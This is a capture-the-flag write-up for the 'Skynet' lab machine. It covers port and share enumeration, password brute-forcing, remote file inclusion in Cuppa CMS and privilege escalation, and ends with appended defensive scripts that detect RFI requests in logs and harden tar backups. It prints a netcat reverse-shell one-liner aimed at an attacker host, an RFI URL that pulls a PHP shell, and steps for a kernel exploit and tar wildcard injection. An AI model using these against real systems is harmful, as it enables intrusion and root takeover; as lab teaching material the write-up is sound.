SkyNet
A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine?
Tags: Linux, CVE, RFI, linPEAS
Used Commands
```sh
nmap -sV -sC -oN nmap.out -vv <target ip>
gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
/usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
smbclient //<target ip>/anonymous -U
python -m http.server <webserver port>
wget http://<webserver ip>:<webserver port>/<file name>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh
```
Enumeration
The task description does not give much information, so Nmap and gobuster are a good way to start. The next two steps show how I enumerated the target with Nmap and gobuster; the third step summarizes the information that was found.
Nmap
Run: nmap -sV -sC -oN nmap.out -vv <target ip>
```text
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-24 20:54 UTC
NSE: Loaded 151 scripts for scanning.
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE RESP-CODES SASL PIPELINING TOP CAPA
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: Pre-login more LITERAL+ have LOGINDISABLEDA0001 ID IDLE post-login SASL-IR listed ENABLE OK IMAP4rev1 LOGIN-REFERRALS capabilities
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:9D:B2:03:AA:DD (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Continue with the next step in another shell.
Gobuster
Start gobuster and let it work in parallel. I expected a different result when running the following command without a specified port, but this was not the case.
Run: gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
```text
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.61.56:80
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/24 21:08:15 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/24 21:08:32 Finished
===============================================================
```
What’s in the reports?
Nmap and Gobuster show a couple of open ports and available directories. Read the reports carefully; you should be able to extract information similar to what I've listed below:

| Service | Port |
|---|---|
| Apache 2.4.18 Webserver | 80 |
| SMB | 139/445 |
| SSH | 22 |
| Dovecot Mailserver | 110/143 |

| Directory | Result |
|---|---|
| /admin | Forbidden |
| /config | Forbidden |
| /squirrelmail | Login |
| /ai | Forbidden |
Further, have a look at the source code of the website. Sometimes you can spot some useful information.
Website
Open your browser and navigate to http://<target ip>
![Screenshot of the website behind the webserver](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_welcome.png)
I played around a little but there doesn't seem to be much there. Then I used searchsploit in the hope of finding some vulnerabilities for Apache 2.4.18 but couldn't find anything that helps to get a foot in the door. At this point, I thought about going for that login screen at /squirrelmail, but the information is scarce, so I decided to go for SMB.
Let’s go!
SMB
Use enum4linux to collect info about the shares. Run it using the path to your enum4linux.pl script.
For me it’s /usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
```text
==========================
| Target Information |
==========================
Target ........... 10.10.61.56
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
====================================
| Session Check on 10.10.61.56 |
====================================
[+] Server 10.10.61.56 allows sessions using username '', password ''
...
============================
| Users on 10.10.61.56 |
============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
...
========================================
| Share Enumeration on 10.10.61.56 |
========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.61.56
//10.10.61.56/print$ Mapping: DENIED, Listing: N/A
//10.10.61.56/anonymous Mapping: OK, Listing: OK
//10.10.61.56/milesdyson Mapping: DENIED, Listing: N/A
//10.10.61.56/IPC$ [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing
======================================================================
| Users on 10.10.61.56 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-500 *unknown*\*unknown* (8)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
...
```
Check the output and note the information that is useful to us:

| Fact | Description |
|---|---|
| Anonymous Login | Yes |
| Users | SKYNET\milesdyson (Local User) |
| Shares | anonymous, milesdyson |
Let’s try to connect and see what we get! The share of interest is anonymous, the user is '' and the password is ''.
Run: smbclient //<target ip>/anonymous -U
and confirm twice.
```text
root@kali:~/Desktop# smbclient //10.10.61.56/anonymous -U
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 07:20:17 2019
attention.txt N 163 Wed Sep 18 03:04:59 2019
logs D 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5788828 blocks available
```
Get both attention.txt and the log files in logs. attention.txt reads:
```text
A recent system malfunction has caused various passwords to be changed.
All skynet employees are required to change their password after seeing this.
-Miles Dyson
```
log1.txt seems to contain some passwords. The user is milesdyson and the password is taken from that list.
First I used Hydra and tried to brute-force SMB without success. So I chose to switch over to /squirrelmail.
SquirrelMail
![Login screen showing SquirrelMail](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_squirrelmail.png)
I used BurpSuite for brute-forcing the password. If you are not familiar with Burp Suite check out this introductory room on THM BurpSuite created by DarkStar7471.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_brute_force_squirrel.png)
Load the password list and start the attack. You will receive a list of responses; pick the one that stands out (look at the response code). Use those credentials and try to log in.
That’s also the password the current task is asking for.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_squirrelmail.png)
Read through the mails and find the following info:
| # | Information |
|---|---|
| 1 | Password for SMB |
| 2 | Binary string |
| 3 | Some strange text |
The first mail shows a new password that we will give a try!
The second mail contains some binary code.
The third mail contains some more crazy text.
Use the password in the first mail to log in using smbclient like above.
Run: smbclient //<target ip>/milesdyson -U milesdyson
```text
Enter WORKGROUP\milesdysons password: <password from email>
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5831472 blocks available
smb: \>
```
What’s the hidden directory?
Check out the notes directory and find important.txt. This file names a hidden folder:
```text
1. Add features to beta CMS /****************
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_personal_page.png)
There is nothing really useful on this site. Seems to be a dead end. Let’s go through what we have found so far.
Quick Summary
There is SSH, SMB, an Apache Webserver, and a Dovecot MailServer.
We successfully logged into SMB share anonymous and found a text file that told us that there was a malfunction causing passwords to be changed.
One of the log files contained a list of passwords that we used to brute-force into SquirrelMail.
We again found a password in one of the mails and successfully logged into the SMB share of milesdyson. From there we found another hidden directory.
Let’s move on and enumerate the hidden directory.
For me, that part was a bit tricky because digging deeper was not my first thought about how to continue. Instead, I was looking for any options regarding SSH but then found out there wasn’t enough information to do so. Finally, I got stuck at this point and had to read another write-up to get my feet on the ground. The solution is quite simple: start over and collect more info from a different base.
Digging deeper
Navigate to that directory using your browser. There is an image of milesdyson and some text about him. The source code does not give any more information. The only option seems to be to dig deeper.
Run: gobuster dir -u http://<target ip>/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_gobuster_hidden.png)
There is another directory, /administrator. Navigate there and find a CMS (something we already read about in the notes).
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_cuppa.png)
Great! We don’t have credentials to log in, but what about using searchsploit? Maybe there are some known exploits for this CMS.
searchsploit cuppa
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_searchsploit_cuppa.png)
You can also check out the corresponding CVE on exploit-db and read the description there.
That’s another question that you can answer now.
What's the vulnerability called when you can include a remote file for malicious purposes?
Two thirds of the answer is in the title of the exploit you downloaded. Use Google and search for the first word; you’ll quickly find it on your own.
Gain initial Reverse Shell
It’s recommended to read the exploit description in every detail to understand the following.
Download php-reverse-shell.php from github and change the IP and port.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_reverse_shell_php.png)
- Set up a webserver: python3 -m http.server 8888
- Set up a Netcat listener: nc -lvnp 4444. Use the same port that you entered in php-reverse-shell.php.
- Append alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php to the URL of the login page http://<target ip>/45kra24zxs28v3yd/administrator/.
The URL should look like this:
http://<target ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php
Copy that URL to your browser and hit enter.
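As an added example (not part of the original write-up), the same request pattern seen from the defender's side: a small grep over constructed Apache access-log lines that flags requests whose query parameter value is itself a URL or a PHP stream wrapper, which is how an attempt to include a remote file shows up in the web server log. The log lines, client addresses and paths are constructed for illustration.

```sh
#!/bin/sh
# Constructed sample access-log lines (combined log format); not taken from the room.
SAMPLE_LOG='10.0.0.5 - - [24/Apr/2021:21:30:01 +0000] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Apr/2021:21:31:10 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.0.0.9:8888/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Apr/2021:21:32:44 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Apr/2021:21:33:02 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.0.0.9 - - [24/Apr/2021:21:34:15 +0000] "GET /index.php?page=https%3A%2F%2F10.0.0.9%2Fx.txt HTTP/1.1" 200 0 "-" "curl/7.68.0"'

# Print every request whose query string assigns a parameter a value that
# starts with a URL scheme or a PHP stream wrapper (plain or percent-encoded).
# Matching on the value position ("=scheme:") keeps ordinary paths that merely
# contain a hostname from triggering it.
detect_rfi_attempts() {
  grep -Ei '"(GET|POST) [^" ]*\?[^" ]*=(https?|ftp|php|data|expect)(:|%3a)' "$1"
}

# Number of flagged lines in a log file, as a bare integer.
count_rfi_attempts() {
  detect_rfi_attempts "$1" | wc -l | tr -d ' '
}

# Stand-alone usage: write the sample to a temp file and show the hits.
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp)
  printf '%s\n' "$SAMPLE_LOG" > "$tmp"
  detect_rfi_attempts "$tmp"
  rm -f "$tmp"
fi
```

On the sample above the filter reports three lines (the urlConfig request and the two page= requests) and leaves the login-page and SquirrelMail requests alone.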
Extend Shell to root
Read different write-ups and you will see different approaches. A good way to start is e.g. sudo -l or the crontabs. Try both ways on your own.
Solution 1: Linux Kernel
On the attack machine:
- Check the Linux version: 4.8
- Use searchsploit Linux 4.8 to search for any vulnerabilities. There is one record with a version matching the OS version above.
- Copy this exploit to your local folder using searchsploit -m 43418.c
- Start a webserver in the folder where you copied the exploit to: python -m http.server 8888
On the target machine:
- Change directory with cd /var/www/html, as user www-data can write there.
- Download the file to the target via http.server: wget http://<webserver ip>:8888/43418.c
```text
$ wget http://10.10.48.92:8000/43418.c
--2021-04-29 11:42:36-- http://10.10.48.92:8000/43418.c
Connecting to 10.10.48.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: '43418.c'
0K .......... .......... ... 100% 65.5M=0s
2021-04-29 11:42:36 (65.5 MB/s) - '43418.c' saved [24033/24033]
```
- Compile that file: gcc 43418.c -o privesc
- and run ./privesc
```text
$ gcc 43418.c -o privesc
$ ./privesc
bash: cannot set terminal process group (1290): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# whoami
whoami
root
root@skynet:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
```
Solution 2: Wildcards
This way is quite interesting! For further reading, search Google for "exploit tar wildcard for privilege escalation".
The principle behind this approach is to trick tar into executing a file as a different user (e.g. as root): when a cron job runs tar with a wildcard, file names that start with -- are expanded by the shell and parsed by tar as options.
In the following case multiple files are created:
- a file that tells tar to stop at a specific checkpoint
- another file that tells tar what to do at this specific checkpoint
- and finally the file that should be executed, shell.sh
```sh
cd /var/www/html
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh
```
Start a Netcat listener on the attacker machine with nc -lvnp <port> and wait until the next cron job has finished.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_root_wildcards.png)
Congrats! You are root! Now locate the root flag and finish that room.
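As an added example (not from the write-up), the wildcard trick above viewed from the administrator's side: a POSIX shell helper that audits a directory for file names beginning with "-" (the names that a cron job running tar cf backup.tar * in that directory would hand to tar as options), plus the hardened form of the backup command, which puts -- before the wildcard so every expanded name is treated as a path. Directory and file names are constructed; the helper names are hypothetical.

```sh
#!/bin/sh
# List file names in $1 that start with "-". A cron job that runs
# "tar cf backup.tar *" in this directory would pass such names to tar
# as options (e.g. --checkpoint-action=exec=...), which is the wildcard
# injection used in the write-up.
find_option_like_names() {
  for f in "$1"/-*; do
    [ -e "$f" ] || continue      # the glob matched nothing
    basename -- "$f"
  done | sort
}

# Hardened backup: "--" ends option parsing, so every name the shell
# expands from * is an operand even if it begins with "--". Writing the
# archive outside $1 also keeps tar from archiving the archive itself.
safe_backup() {
  dir="$1"; out="$2"
  ( cd "$dir" && tar -cf "$out" -- * )
}

# Number of entries in an archive, to check what was captured.
archive_entry_count() {
  tar -tf "$1" | wc -l | tr -d ' '
}

# Stand-alone demo on a constructed web root.
if [ "${1:-}" = "--demo" ]; then
  root=$(mktemp -d); outdir=$(mktemp -d)
  touch "$root/index.php" "$root/--checkpoint=1" "$root/--checkpoint-action=exec=sh shell.sh"
  echo "option-like names:"; find_option_like_names "$root"
  safe_backup "$root" "$outdir/backup.tar"
  tar -tf "$outdir/backup.tar"
  rm -rf "$root" "$outdir"
fi
```

With the two crafted names present, the hardened command still archives them as ordinary files and no checkpoint action runs; a periodic run of the audit helper over web-writable directories is a cheap way to spot the staging step before the next cron job fires.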